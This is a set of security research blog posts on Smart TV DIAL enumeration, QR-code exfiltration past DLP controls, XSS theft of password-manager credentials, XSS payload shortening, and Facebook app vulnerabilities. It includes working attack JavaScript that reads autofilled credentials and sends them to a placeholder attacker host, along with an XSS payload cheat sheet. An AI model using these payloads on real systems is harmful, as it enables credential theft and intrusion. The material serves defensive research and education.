Smart TV + Smartphone = Shiny New Attack Surfaces

According to a Gartner report from December 2012, “85 percent of all flat-panel TVs will be Internet-connected Smart TVs by 2016.” Forbes magazine offers some analysis of what is fueling this trend, and mentions “DIAL”, an enabling technology for second-screen features (which this post is about). With these new devices come new risks, as evidenced in press coverage as well as more recent research about Smart TV risks presented at the CanSecWest and DefCon security conferences this year (2013).

For more details about exactly what features a Smart TV has above and beyond a normal television, consult this Wikipedia article:

This post introduces and describes aspects of “DIAL”, a protocol developed by Google and Netflix for controlling Smart TVs with smartphones and tablets. DIAL provides “second screen” features, which allow users to watch videos and other content on a TV using a smartphone or tablet. This article will review sample code for network discovery and for enumerating the Smart TV apps that use this protocol.

Part 1: Discovery and Enumeration

Smart TVs are similar to other modern devices in that they have apps. Smart TVs normally ship with apps for YouTube(tm) and Netflix(tm), as well as many other built-in apps. If you have a smartphone, then maybe you’ve noticed that when your smartphone and TV are on the same network, a small square icon appears in some mobile apps, allowing you to play videos on the big TV and control the TV apps from your smartphone. In this setup, the TV is a “first screen” device, and the phone or tablet functions as a “second screen” controlling the first screen.

DIAL, which stands for “Discovery and Launch”, is the network protocol used for these features and is a standard developed jointly by Google and Netflix (see the DIAL specification). The name sounds vaguely similar to other network protocols, namely RPC (remote procedure call). Basically, DIAL gives devices a way to quickly locate specified networked devices (TVs) and controlling programs (apps) on those devices.

Let’s take a look at the YouTube mobile application to see how exactly this magic happens. Launching the YouTube mobile app with a Smart TV on the network (turned on, of course) shows the magic square, indicating a DIAL-enabled screen is available:

Magic TV Square

Square appears when YouTube app finds TVs on the network.

Clicking the square provides a selection menu where the user may choose which screen will play YouTube videos. Recent versions of the YouTube app allow “one touch pairing”, which makes all of the setup easy for the user:


Let’s examine the traffic generated by the YouTube mobile app at launch.

  • The YouTube mobile app sends an initial SSDP request to discover available first-screen devices on the network.
  • The packet is destined for a multicast address ( on UDP port 1900. Multicast is useful because all devices on the local subnet can listen for it, even though it is not specifically addressed to them.
  • The multicast packet contains the string “urn:dial-multiscreen-org:service:dial:1”. A Smart TV will respond to this request, telling the YouTube mobile app its network address and information about how to access it.

A broadcast search request from the YouTube mobile app looks like this:

11:22:33.361831 IP my_phone.41742 > UDP, length 125
0x0010: .......l..+;M-SE
0x0020: ARCH.*.HTTP/1.1.
0x0030: .HOST:.239.255.2
0x0040: 55.250:1900..MAN
0x0050: :."ssdp:discover
0x0060: "..MX:.1..ST:.ur
0x0070: n:dial-multiscre
0x0080: en-org:service:d
0x0090: ial:1....
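The capture above can be reproduced programmatically. Below is a sketch of building the full, spec-shaped M-SEARCH request; the header values mirror the packet dump, and the DIAL specification has the authoritative example:

```python
# Build the SSDP M-SEARCH request seen in the capture above.
SSDP_ADDR = ""   # SSDP multicast group
SSDP_PORT = 1900
DIAL_ST = "urn:dial-multiscreen-org:service:dial:1"

def build_msearch():
    lines = [
        "M-SEARCH * HTTP/1.1",
        "HOST: %s:%d" % (SSDP_ADDR, SSDP_PORT),
        'MAN: "ssdp:discover"',
        "MX: 1",        # seconds a device may wait before replying
        "ST: " + DIAL_ST,
        "", "",         # the request ends with a blank line (CRLF CRLF)
    ]
    return "\r\n".join(lines)

# To actually send it (requires a DIAL device on the LAN):
# import socket
# s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# s.sendto(build_msearch().encode(), (SSDP_ADDR, SSDP_PORT))
```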

Of course, the YouTube app isn’t the only program that can discover ready-to-use Smart TVs. The following is a DIAL discoverer in a few lines of Python. It waits 5 seconds for responses from listening TVs. (Note: the request sent in this script is minimal; the DIAL protocol specification has a full request packet example.)

#! /usr/bin/env python
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.settimeout(5.0)
s.sendto("ST: urn:dial-multiscreen-org:service:dial:1",
         ("", 1900))
try:
    while 1:
        data, addr = s.recvfrom(1024)
        print "[*] response from %s:%d" % addr
        print data
except socket.timeout:
    pass

A response from a listening Smart TV on the network looks like:

[*] response from
HTTP/1.1 200 OK
CACHE-CONTROL: max-age=1800
SERVER: Linux/2.6 UPnP/1.0 quick_ssdp/1.0
ST: urn:dial-multiscreen-org:service:dial:1
USN: uuid:bcb36992-2281-12e4-8000-006b9e40ad7d::urn:dial-multiscreen-org:service:dial:1

Notice that the TV returns a LOCATION header with a URL. Reading that URL leads to yet another URL which provides the “apps” link on the TV.

HTTP/1.1 200 OK
Content-Type: application/xml
<?xml version="1.0"?><root xmlns="urn:schemas-upnp-org:device-1-0" xmlns:r="urn:restful-tv-org:schemas:upnp-dd"> <specVersion> <major>1</major> <minor>0</minor> </specVersion>
<device> <deviceType>urn:schemas-upnp-org:device:tvdevice:1</deviceType> <friendlyName>Vizio DTV</friendlyName> <manufacturer>Vizio Inc.</manufacturer> <modelName>Vizio_E420i_A0</modelName>
<UDN>uuid:bcb36992-2281-12e4-8000-006b9e40ad7d</UDN> </device> </root>
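The interesting fields of that device description can be pulled out with the standard library. A minimal sketch, using a trimmed copy of the Vizio response above (note that the UPnP default namespace has to be handled explicitly):

```python
import xml.etree.ElementTree as ET

# Trimmed device description, as returned by the TV above.
DESCRIPTION = """<?xml version="1.0"?>
<root xmlns="urn:schemas-upnp-org:device-1-0">
  <device>
    <friendlyName>Vizio DTV</friendlyName>
    <manufacturer>Vizio Inc.</manufacturer>
    <modelName>Vizio_E420i_A0</modelName>
  </device>
</root>"""

NS = {"upnp": "urn:schemas-upnp-org:device-1-0"}

def device_info(xml_text):
    """Return the identifying fields of a UPnP device description."""
    root = ET.fromstring(xml_text)
    dev = root.find("upnp:device", NS)
    return {tag: dev.find("upnp:" + tag, NS).text
            for tag in ("friendlyName", "manufacturer", "modelName")}

info = device_info(DESCRIPTION)
```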

At this point, the YouTube mobile app will try to access the “apps” URL combined with the application name, sending a GET request to a URL of the form http://&lt;TV address&gt;/apps/YouTube. A positive response indicates the application is available, and returns an XML document detailing some data about the application state and feature support:

HTTP/1.1 200 OK
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<service xmlns="urn:dial-multiscreen-org:schemas:dial">
  <name>YouTube</name>
  <options allowStop="false"/>
  <state>stopped</state>
</service>

Those of you who have been following along may have noticed how easy this has been. So far, we have sent one UDP packet and issued two GET requests. This has netted us:

  • The IP address of a Smart TV
  • The operating system of the Smart TV (Linux 2.6)
  • Two listening web services on random high ports.
  • A RESTful control interface to the TV’s YouTube application.

If only all networked applications/attack surfaces could be discovered this easily. What should we do next? Let’s make a scanner. After getting the current list of all registered application names (as of Sept 18, 2013)  from the DIAL website, it is straightforward to create a quick and dirty scanner to find the apps on a Smart TV:

#! /usr/bin/env python
# Enumerate apps on a SmartTV
import urllib2
import sys

# Registered application names from the DIAL registry
# (partial list; fetch the full registry from the DIAL website):
apps = [ 'Twonky TV','Turner-TNT-Leverage','Turner-TBS-BBT','Turner-NBA-GameTime',
'org.enlearn.Copilot','frequency', 'PlayMovies' ]

if len(sys.argv) != 2:
    print "Usage: %s tv_apps_url" % sys.argv[0]
    sys.exit(1)
url = sys.argv[1]

for app in apps:
    try:
        u = urllib2.urlopen("%s/%s" % (url, app))
        print "%s:%s" % (app, repr(str(u.headers)))
    except urllib2.URLError:
        pass

Some of those app names appear pretty interesting. (Note to self: Find all corresponding apps.) The scanner looks for URLs returning positive responses (200 result codes and some XML), and prints them out:

 $ ./ 

YouTube:'Content-Type: application/xml\r\n<?xml version="1.0" encoding="UTF-8"?>\r\n<service xmlns="urn:dial-multiscreen-org:schemas:dial">\r\n  <name>YouTube</name>\r\n  <options allowStop="false"/>\r\n  <state>stopped</state>\r\n</service>\r\n'

Netflix:'Content-Type: application/xml\r\n<?xml version="1.0" encoding="UTF-8"?>\r\n<service xmlns="urn:dial-multiscreen-org:schemas:dial">\r\n  <name>Netflix</name>\r\n  <options allowStop="false"/>\r\n  <state>stopped</state>\r\n</service>\r\n'
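Each positive response carries a small service document like the ones above; here is a short sketch of extracting the app name and state with the standard library (XML copied from the YouTube response):

```python
import xml.etree.ElementTree as ET

# Service document as returned for a positive /apps/<name> probe.
SERVICE_XML = """<?xml version="1.0" encoding="UTF-8"?>
<service xmlns="urn:dial-multiscreen-org:schemas:dial">
  <name>YouTube</name>
  <options allowStop="false"/>
  <state>stopped</state>
</service>"""

NS = {"dial": "urn:dial-multiscreen-org:schemas:dial"}

def app_state(xml_text):
    """Return (app name, running state) from a DIAL service document."""
    svc = ET.fromstring(xml_text)
    return (svc.find("dial:name", NS).text,
            svc.find("dial:state", NS).text)
```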

Hopefully this article has been informative for those who may be looking for new devices and attack surfaces to investigate during application or penetration testing.


DLP Circumvention: A Demonstration of Futility

By Ben Toews

TLDR: Check out the tool

I can’t say that I’m an expert in Data Loss Prevention (DLP), but I imagine it’s hard. The basic premise is to prevent employees or others from getting data out of a controlled environment: for example, preventing the DBA from stealing everyone’s credit card numbers, or the researcher from walking out the door with millions in trade secrets. DLP is even tougher in light of new techniques for moving confidential data undetected through a network. When I demonstrated how I could do it with QR codes, I had to rethink DLP protections.

Some quick research informs me that the main techniques for implementing DLP are to monitor and restrict access to data both physically and from networking and endpoint perspectives. Physical controls might consist of putting locks on USB ports or putting an extra locked door between your sensitive environment and the rest of the world. Networking controls might consist of firewalls, IDS, content filtering proxies, or maybe just unplugging the sensitive network from the rest of the network and the internet.

Many security folks joke about the futility of this effort. It seems that a determined individual can always find a way around these mechanisms. To demonstrate, my co-worker, Scott Behrens, was working on a Python script to convert files to a series of QR codes (2D bar codes) that could be played as a video file. This video could then be recorded and decoded by a cell-phone camera and stored as files on another computer. However, it seemed to me that with the new JavaScript/HTML5 file APIs, all the work of creating the QR code videos could be done in the browser, avoiding the need to download a Python script/interpreter.

I was talking with a former co-worker about this idea, and he went off and wrote an HTML5/JS encoder and an ffmpeg/bash/ruby decoder that seemed to work pretty well. Not wanting to be outdone, I kept going and wrote my own encoder and decoder.

My encoder is fairly simple. It uses the file API to read in multiple files from the computer, uses Stuart Knightley’s JSZip library to create a single ZIP file, and then Kazuhiko Arase’s JavaScript QRCode Generator to convert this file into a series of QRCodes. It does this all in the browser without requiring the user to download any programs or transmit any would-be-controlled data over the network.
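The encoder’s first two stages (zip the files, then split the archive into QR-sized payloads) can be sketched in a few lines of Python; the 2048-byte chunk size is an arbitrary assumption, and actually rendering each payload as a QR code is left to a QR library:

```python
import base64
import io
import zipfile

def zip_files(files):
    """files: dict of {name: bytes}. Returns the ZIP archive as bytes."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        for name, data in files.items():
            z.writestr(name, data)
    return buf.getvalue()

def qr_payloads(blob, chunk_size=2048):
    """Base64 the archive and split it into chunks, one per QR code.
    chunk_size is an assumption; real capacity depends on the QR
    version and error-correction level used by the renderer."""
    b64 = base64.b64encode(blob)
    return [b64[i:i + chunk_size] for i in range(0, len(b64), chunk_size)]

payloads = qr_payloads(zip_files({"secret.txt": b"would-be-controlled data"}))
```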

The decoder was a little less straightforward. I had been wanting to learn OpenCV for a non-security-related side project, so I decided to use it for this. It turns out that it is not entirely easy to use, and its documentation is somewhat lacking. Still, I persevered and wrote a Python tool to:

  1. Pull images from the video and analyze their color.
  2. Identify the spaces between frames of QRCodes (identified by a solid color image).
  3. Pull the QRCode frames between these marker frames.
  4. Feed them into a ZBar ImageScanner and get the data out.
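Step 2 above, spotting the solid-color marker frames, doesn’t need anything OpenCV-specific. One simple test (an assumption of mine, not necessarily what the tool does) is whether every sampled pixel stays close to the frame’s mean color:

```python
def is_marker_frame(pixels, tolerance=10):
    """pixels: iterable of (r, g, b) tuples sampled from one video frame.
    A frame counts as 'solid' if every sampled pixel stays within
    `tolerance` of the per-channel mean; tolerance absorbs camera noise."""
    pixels = list(pixels)
    n = len(pixels)
    means = [sum(p[c] for p in pixels) / float(n) for c in range(3)]
    return all(abs(p[c] - means[c]) <= tolerance
               for p in pixels for c in range(3))

# A solid green frame (with slight sensor noise) is a marker...
solid = [(0, 250, 0), (2, 255, 1), (1, 252, 0)]
# ...while a frame containing a QR code has black and white regions.
mixed = [(0, 0, 0), (255, 255, 255), (0, 0, 0)]
```

The same per-channel check can be run directly on the pixel arrays OpenCV hands back for each extracted frame.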

The tool seems to work pretty well. Between my crummy cellphone camera and some mystery frames that ZBar refuses to decode, it isn’t the most reliable tool for data transfer, but it serves to make a point. Feel free to download both the encoder and decoder from my GitHub repo or check out the live demo and let me know what you think. I haven’t done any benchmarking of data bandwidth, but it seems reasonable to use the tool for files several megabytes in size.

To speak briefly about preventing the use of tools like this for getting data out of your network: as with most things in security, finding a balance between usability and security is the key. The extreme on the usability end would be an entirely open network without any controls to prevent or detect data loss. The opposite extreme would be to unplug all your computers and shred their hard drives. Considerations in finding the middle ground as it relates to DLP include:

  • The value of your data to your organization.
  • The value of your data to your adversaries.
  • The means of your organization to implement security mechanisms.
  • The means of your adversaries to defeat security mechanisms.

Once your organization has decided what its security posture should be, it can attempt to mitigate risk accordingly. What risk remains must be accepted. For most organizations, the risk presented by a tool like the one described above is acceptable. That being said, techniques for mitigating its risk might include:

  • Disallowing video capture devices in sensitive areas (already common practice in some organizations).
  • Writing IDS signatures for the JavaScript used to generate the QRCodes (this is hard because JS is easily obfuscated and packed).
  • Limiting access within your organization to sensitive information.
  • Trying to prevent the QRCode-creating portion of the tool from reaching your computers.
    • Physical Protections (USB port locks, removing CD Drives, etc.)
    • Network Protections (segmentation, content filtering, etc.)

Good luck ;)

Apparently the term ‘QR Code’ is a registered trademark of DENSO WAVE INCORPORATED.

Abusing Password Managers with XSS

By Ben Toews

One common and effective mitigation against Cross-Site Scripting (XSS) is to set the HTTPOnly flag on session cookies. This will generally prevent an attacker from stealing users’ session cookies with XSS. There are ways of circumventing this (e.g. the HTTP TRACE method), but generally speaking, it is fairly effective. That being said, an attacker can still cause significant damage without being able to steal the session cookie.

A variety of client-side attacks are possible, but an attacker is also often able to circumvent Cross-Site Request Forgery (CSRF) protections via XSS and thereby submit various forms within the application. The worst-case scenario with this type of attack would be that there is no confirmation for email address or password changes, and the attacker can change users’ passwords. From an attacker’s perspective this is valuable, but not as valuable as being able to steal a user’s session. By resetting the password, the attacker gives away his presence, and the extent to which he can masquerade as another user is limited. While stealing the session cookie may be the most commonly cited method for hijacking user accounts, other means that don’t involve changing user passwords exist.

All modern browsers come with some functionality to remember user passwords. Additionally, users will often install third-party applications to manage their passwords for them. All of these solutions save time for the user and generally help to prevent forgotten passwords. Third-party password managers such as LastPass are also capable of generating strong, application-specific passwords for users and then sending them off to the cloud for storage. Functionality such as this greatly improves the overall security of the username/password authentication model. By encouraging and facilitating the use of strong application-specific passwords, users need not be as concerned with unreliable web applications that inadequately protect their data. For these and other reasons, password managers such as LastPass are generally considered within the security industry to be a good idea. I am a long-time user of LastPass and have (almost) nothing but praise for their service.

An issue with both in-browser and third-party password managers that gets hardly any attention is how they can be abused by XSS. Because many of these password managers automatically fill login forms, an attacker can use JavaScript to read the contents of the form once it has been filled. The lack of attention this topic receives made me curious to see how exploitable it actually would be. For the purpose of testing, I built a simple PHP application with a functional login page as well as a second page that is vulnerable to XSS (find them here). I then proceeded to experiment with different JavaScript, attempting to steal user credentials with XSS from the following password managers:

  • LastPass (Current version as of April 2012)
  • Chrome (version 17)
  • Firefox (version 11)
  • Internet Explorer (version 9)

I first visited my login page and entered my password. If the password manager asked me if I wanted it to be remembered, I said yes. I then went to the XSS vulnerable page in my application and experimented with different JavaScript, attempting to access the credentials stored by the browser or password manager. I ended up writing some JavaScript that was effective against the password managers listed above with the exception of IE:

<script type="text/javascript">
    ex_username = '';
    ex_password = '';
    inter = '';
    function attack(){
        ex_username = document.getElementById('username').value;
        ex_password = document.getElementById('password').value;
        if(ex_username != '' | ex_password != ''){
            document.getElementById('xss').style.display = 'none';
            request = new XMLHttpRequest();
            // attacker-controlled collection point (placeholder host)
            url = "http://attacker.example/?username="+ex_username+"&password="+ex_password;
            request.open("GET", url, true);
            request.send();
            window.clearInterval(inter);
        }
    }
    document.write("\
    <div id='xss'>\
    <form method='post' action='index.php'>\
    username:<input type='text' name='username' id='username' value='' autocomplete='on'>\
    password:<input type='password' name='password' id='password' value='' autocomplete='on'>\
    <input type='submit' name='login' value='Log In'>\
    </form>\
    </div>");
    inter = window.setInterval("attack()",100);
</script>

All that this code does is create a fake login form on the XSS-vulnerable page and then wait for it to be filled in by the browser or password manager. When the fields are filled, the JavaScript takes the values and sends them off to another server via a simple Ajax request. At first I attempted to harness the onchange event of the form fields, but it turns out that this is unreliable across browsers (also, LastPass seems to mangle the form and input field DOM elements for whatever reason). Using window.setInterval, while less elegant, is more effective.

If you want to try out the above code, go to the demo app and log in (username: user1, password: secret). Then go to the reflections page and enter the slightly modified code listed there into the text box. If you told your password manager to remember the password for the site, you should see an alert box with the credentials you previously entered. Please let me know if you find any vulns aside from XSS in this app.

To be honest, I was rather surprised that my simple trick worked in Chrome and Firefox. The LastPass plugin in the Chrome browser operates on the DOM level like any other Chrome plugin, meaning that it can’t bypass event listeners that are watching for form submissions. The browsers, on the other hand, could put garbage into the form elements in the DOM and wait until after the onsubmit event has fired to put the real credentials into the form. This might break some web applications that take action based on the onchange event of the form inputs, but if that is a concern, I am sure that the browsers could somehow fill the form fields without triggering this event.

The reason this code doesn’t work in IE (aside from the non-IE-friendly XHR request) is that the IE password manager doesn’t automatically fill in user credentials. IE also seems to be the only one of the bunch that ties a set of credentials to a specific page rather than to an entire domain. While both of these may be inconveniences from a usability perspective, they (inadvertently or otherwise) improve the security of the password manager.

While this is an attack vector that doesn’t get much attention, I think that it should. XSS is a common problem, and developers get an unrealistic sense of security from the HTTPOnly cookie flag. This flag is largely effective in preventing session hijacking, but user credentials may still be at risk. While I didn’t get a chance to check them out when researching this, I would not be surprised if Opera and Safari had the same types of behavior.

I would be interested to hear a discussion of possible mitigations for this vulnerability. If you are a browser or browser-plugin developer or just an ordinary hacker, leave a comment and let me know what you think.

Edit: Prompted by some of the comments, I wrote a little script to demo how you could replace the whole document.body with that of the login page and use pushState to trick a user into thinking that they were on the login page.

XSS Shortening Cheatsheet

By Ben Toews

In the course of a recent assessment of a web application, I ran into an interesting problem. I found XSS on a page, but the field was limited (yes, on the server side) to 20 characters. Of course I could demonstrate the problem to the client by injecting a simple <b>hello</b> into their page, but it leaves much more of an impression of severity when you can at least make an alert box.

My go-to line for testing XSS is always <script>alert(123123)</script>. It looks somewhat arbitrary, but I use it specifically because 123123 is easy to grep for and will rarely show up as a false positive (a quick Google search returns only 9 million pages containing the string 123123). It is also nice because it doesn’t require apostrophes.

This brings me to the problem. The above string is 30 characters long, and I needed to inject into a parameter that will only accept up to 20 characters. There are a few tricks for shortening your <script> tag, some better known than others. Here are a few:

  • If you don’t specify the scheme section of the URL (http/https/whatever), the browser uses the current scheme. E.g. <script src='//'></script>
  • If you don’t specify the host section of the URL, the browser uses the current host. This is only really valuable if you can upload a malicious JavaScript file to the server you are trying to get XSS on. E.g. <script src='evil.js'></script>
  • If you are including a JavaScript file from another domain, there is no reason why its extension must be .js. Pro tip: you could even have the malicious JavaScript file be set as the index on your server… E.g. <script src=''>
  • If you are using IE, you don’t need to close the <script> tag (although I haven’t tested this in years and don’t have a Windows box handy). E.g. <script src=''>
  • You don’t need quotes around your src attribute. E.g. <script src=></script>

In the best case (your victim is running IE and you can upload arbitrary files to the web root), it seems that all you would need is <script src=/>. That’s pretty impressive, weighing in at only 14 characters. Then again, when will you actually get to use that in the wild or on an assessment? More likely, you will have to host your malicious code on another domain. I own a short domain, but it is not quite as handy as some of the five-letter domain names. If you have one of those, the best you could do is <script>. This is 18 characters and works in IE, but let’s assume that you want to be cross-platform and go with the 27-character option of <script></script>. That’s still pretty short, but we are back over my 20-character limit.

Time to give up? I think not.

Another option is to forgo the <script> tag entirely. After all, ‘script’ is such a long word… There are many one-letter HTML tags that accept event handlers, and onclick and onkeyup are even pretty short. Here are a couple more tricks:

  • You can make up your own tags! E.g. <x onclick="alert(1)">foo</x>
  • If you don’t close your tag, some events will be inherited by the rest of the page following your injected code. E.g. <x onclick='alert(1)'>
  • You don’t need to wrap your code in quotes. E.g. <b onclick=alert(1)>foo</b>
  • If the page already has some useful JavaScript (think jQuery) loaded, you can call their functions instead of your own. E.g. if they have a function defined as function a(){alert(1)}, you can simply do <b onclick='a()'>foo</b>
  • While onclick and onkeyup are short when used with <b> or a custom tag, they aren’t going to fire without user interaction. The onload event of the <body> tag, on the other hand, will. I think that having duplicate <body> tags might not work in all browsers, though. E.g. <body onload='alert(1)'>

Putting these tricks together, our optimal solution (assuming they have a one-letter function defined that does exactly what we want) gives us <b onclick=a()>. Similar to the unrealistically good <script> tag example from above, this comes in at just 15 characters. A more realistic and useful line might be <b onclick=alert(1)>. This comes in at exactly 20 characters, which is within my limit.
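For anyone keeping score, the character counts above are easy to verify programmatically; Python here is just doing the counting:

```python
# Candidate payloads discussed above, shortest-case to realistic.
payloads = [
    "<script>alert(123123)</script>",  # the go-to test string
    "<script src=/>",                  # best case: IE + file in web root
    "<b onclick=a()>",                 # requires an existing one-letter helper
    "<b onclick=alert(1)>",            # realistic and self-contained
]
for p in payloads:
    print(len(p), p)
```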

This worked for me, but maybe 20 characters is too long for you. If you really have to be a minimalist, injecting the <b> tag into the page is the smallest thing I can think of that will affect the page without raising too many errors. Slightly more minimalistic than that would be to simply inject <. This would likely break the page, but it would at least be noticeable and would prove your point.

This article is by no means intended to provide the answer, but rather to ask a question. I ask, or dare I say challenge, you to find a better solution than what I have shown above. It is also worth noting that I tested most of this on recent versions of Firefox and Chrome, but no other browsers. I am using a Linux box and don’t have access to much else at the moment. If you know that some of the above code does not work in other browsers, please comment below and I will make an edit, but please don’t tell me what does and does not work in lynx.

If you want to see some of these in action, copy the following into a file and open it in your browser, or go to the demo page.

Edit: albinowax points out that onblur is shorter than onclick or onkeyup.

<title>xss example</title>
<script>
//my awesome js
function a(){alert(1)}
</script>

<!-- XSS Injected here -->
<x onclick=alert(1)>
<b onkeyup=alert(1)>
<x onclick=a()>
<b onkeyup=a()>
<body onload=a()>
<!-- End XSS Injection -->

<h1>XSS ROCKS</h1>
<p>click me</p>
<input value='try typing in here'>

PS: I did some Googling before writing this. Thanks to those at and at gnarlysec.

Facebook Applications Have Nagging Vulnerabilities

By Neohapsis Researchers Andy Hoernecke and Scott Behrens

This is the second post in our Social Networking series. (Read the first one here.)

As Facebook’s application platform has become more popular, the composition of applications has evolved. While early applications seemed to focus on either social gaming or extending the capabilities of Facebook, now Facebook is being utilized as a platform by major companies to foster interaction with their customers in a variety of forms, such as sweepstakes, promotions, shopping, and more.

And why not? We’ve all heard the numbers: Facebook has 800 million active users, 50% of whom log on every day. On average, more than 20 million Facebook applications are installed by users every day, while more than 7 million applications and websites remain integrated with Facebook. (1) Additionally, Facebook is seen as a treasure trove of valuable data accessible to anyone who can get enough “Likes” on their page or application.

As corporate investments in social applications have grown, Neohapsis Labs researchers have been asked to help clients assess these applications and determine what type of risk exposure their release may pose. We took a sample of the applications we have assessed and pulled together some interesting trends. For context, most of these applications are very small (2-4 dynamic pages). The functionality contained in these applications ranged from simple sweepstakes entry forms and contests with content submission (photos, essays, videos, etc.) to gaming and shopping applications.

From our sample, we found that the applications assessed had, on average, vulnerabilities in 2.5 vulnerability classes (e.g. Cross-Site Scripting or SQL Injection), and none of the applications were completely free of vulnerabilities. Given that the attack surface of these applications is so small, this is a somewhat surprising statistic.

The most commonly identified findings in our sample group of applications included Cross-Site Scripting, Insufficient Transport Layer Protection, and Insecure File Upload vulnerabilities. Each of these vulnerabilities classes will be discussed below, along with how the social networking aspect of the applications affects their potential impact.

Facebook applications suffer the most from Cross-Site Scripting. This type of vulnerability was identified in 46% of the applications sampled. This is not surprising, since this age-old problem still creeps into many corporate and personal applications today. An application vulnerable to XSS could be used to attempt browser-based exploits or to steal session cookies (but only in the context of the application’s domain).

These types of applications are generally framed inline [inline framing, or iframing, is a common HTML technique for framing media content] on a Facebook page from the developer’s own servers/domain. This alleviates some of the risk to the user’s Facebook account, since the JavaScript can’t access Facebook’s session cookies. And even if it could, Facebook does use HttpOnly flags to prevent JavaScript from accessing session cookie values. But we have found that companies have a tendency to utilize the same domain name repeatedly for these applications, since the real URL is generally never visible to the end user. This means that if one application has an XSS vulnerability, it could present a risk to any other applications hosted at the same domain.

When third-party developers enter the picture all this becomes even more of a concern, since two clients’ applications may be sharing the same domain and thus be in some ways reliant on the security of the other client’s application.

The second most commonly identified vulnerability, affecting 37% of the sample, was Insufficient Transport Layer Protection. While it is a common myth that conducting a man-in-the-middle attack against cleartext protocols is impossibly difficult, the truth is that it’s relatively simple. Tools such as Firesheep aid in this process, allowing an attacker to create custom JavaScript handlers to capture and replay the right session cookies. About an hour after downloading Firesheep and looking at examples, we wrote a custom handler for an application under assessment that only used SSL when submitting login information. On an unprotected Wi-Fi network, as soon as the application sent any information over HTTP we had valid session cookies, which were easily replayed to compromise the victim’s session.

Once again, the impact of this finding really depends on the functionality of the application, but the wide variety of applications on Facebook does provide an interesting and varied landscape for the attacker to choose from. We only flagged this vulnerability under specific circumstances, where either the application cookies were somehow important (for example, being used to identify a logged-in session) or the application included functionality where sensitive data (such as PII or credit card data) was transmitted.

The third most commonly identified finding was Insecure File Upload. To us, this was surprising, since it’s generally not considered one of the most commonly identified vulnerabilities across all web applications. Nevertheless, 27% of our sample included this type of vulnerability. We attribute its identification rate to the prevalence of social applications that include some type of file upload functionality (to share an avatar, photo, document, movie, etc.).

We found that many of the applications we assessed have their file upload functionality implemented in an insecure way.  Most of the applications did not check content type headers or even file extensions.  Although none of the vulnerabilities discovered led to command injection flaws, almost every vulnerability exploited allowed the attacker to upload JavaScript, HTML or other potentially malicious files such as PDF and executables.  Depending on the domain name affected by this vulnerability, this flaw would aid in the attacker’s social engineering effort as the attacker now has malicious files on a trusted domain.
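A minimal sketch of the kind of server-side check these applications were missing follows. The extension allowlist and magic-byte signatures here are illustrative assumptions, not a complete defense; real applications should also rewrite filenames and serve uploads from a separate domain:

```python
import os

# Illustrative allowlist: extension -> expected leading bytes ("magic").
ALLOWED = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}

def upload_allowed(filename, content):
    """Accept only allowlisted extensions whose content matches the
    expected file signature; reject everything else by default."""
    ext = os.path.splitext(filename.lower())[1]
    magic = ALLOWED.get(ext)
    return magic is not None and content.startswith(magic)
```

With a default-deny check like this, the HTML, JavaScript, PDF, and executable uploads described above would all be rejected before reaching the trusted domain.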

Our assessments also identified a wide range of other vulnerability types. For example, we found several of these applications utilizing publicly available admin interfaces with guessable credentials. Furthermore, at least one of the admin interfaces was riddled with stored XSS vulnerabilities. Server configurations were also a frequent problem, with unnecessarily exposed services and insecure configurations being repeatedly identified.

Finally, we also found that many of these web applications had some interesting issues that are generally unlikely to affect a standard web application. For example, social applications with a contest component may need to worry about the integrity of the contest. If it is possible for a malicious user to game the contest (for example by cheating at a social game and placing a fake high score) this could reflect badly on the application, the contest, and the sponsoring brand.

Even though development of applications integrated with Facebook and other social network sites is increasing, we’ve found companies still tend to handle these outside of their normal security processes. It is important to realize that these applications can present a risk and should be thoroughly examined just like traditional standalone web applications.

Bad Plugins, Vulnerabilities, and Facebook for a Triage of Social Engineering Win

Over the course of the last few months I have worked with clients that are tightly intertwined with Facebook through the use of third party plugins.  These plugins are used by the clients’ customer base for sharing links on their walls, entering promotions, and extending the functionality of the Facebook experience.   These third party applications are just as vulnerable as any other web application, but they have a different platform than a traditional web application, as they are tied directly into Facebook.

This leads to a few interesting opportunities for an attacker who discovers a flaw in one of these applications. For one, there is an inherent trust in the applications on a Facebook page. When a Facebook user adds an application from a company they view favorably, the thought of security might not cross their mind. An attacker can use this to their advantage, especially in the context of social engineering, to exploit a weakness in such a plugin with a higher rate of success. In addition, many websites make use of Facebook’s share.php function, which parses a website and allows a user to share a link to the material on their wall. This sharing function can also be exploited in the event that the third party plugin or site has an open redirect vulnerability.

Open redirection is a vulnerability that simply redirects a user from a seemingly trusted site to an untrusted one. As a vector for client-side attacks, Facebook is an excellent medium. On a recent engagement, I came across a mobile website that was tightly integrated into Facebook. Products and services offered by this company could be shared to Facebook; the non-mobile site had 50,000 or so “likes” and even had an associated plugin. The mobile site was vulnerable to open redirection on every single request: it took a base64-encoded URL of the non-mobile site and redirected every request to that URL (reformatted with some JavaScript). I pulled the HTML and stylesheets for the product I was interested in sharing, base64-encoded the URL of my malicious web server hosting that content, and let the Facebook share.php function parse the site. The link posted to Facebook looked identical to the original and also contained the URL of the trusted site. After a user clicks the product link shared on Facebook, they are redirected to my site, and client-side JavaScript exploits are run.
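As a hedged reconstruction of that scheme (not the actual site’s code; the domain names and the parameter name "u" are assumptions for illustration), the lure link could be built like this:

```python
import base64

def make_lure(trusted_mobile_site, attacker_url):
    """Build a link on the trusted domain whose base64-encoded parameter
    silently redirects the visitor to an attacker-controlled URL."""
    encoded = base64.b64encode(attacker_url.encode()).decode()
    return "%s/?u=%s" % (trusted_mobile_site, encoded)

link = make_lure("http://m.example.com", "http://attacker.example.net/clone")
# The visible link carries only the trusted domain; the real destination is
# hidden inside the base64-encoded parameter.
```

Because the visible portion of the URL belongs to the trusted domain, neither a casual glance nor Facebook’s link preview reveals the true destination.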

Why is this particularly interesting? I could send the same link to users over email. The interesting part is that the link looks legitimate, and Facebook even parses the link’s content, which adds to its legitimacy. In addition, if I have already built rapport with people who like this particular client’s products and services, that further increases the potential effectiveness of the attack.

To help mitigate this risk, ensure your third party plugins are assessed to the same degree as your web applications. If you are a company that allows employees to use Facebook, ensure users are educated on the risks of using Facebook and the plugins that tie into the site.

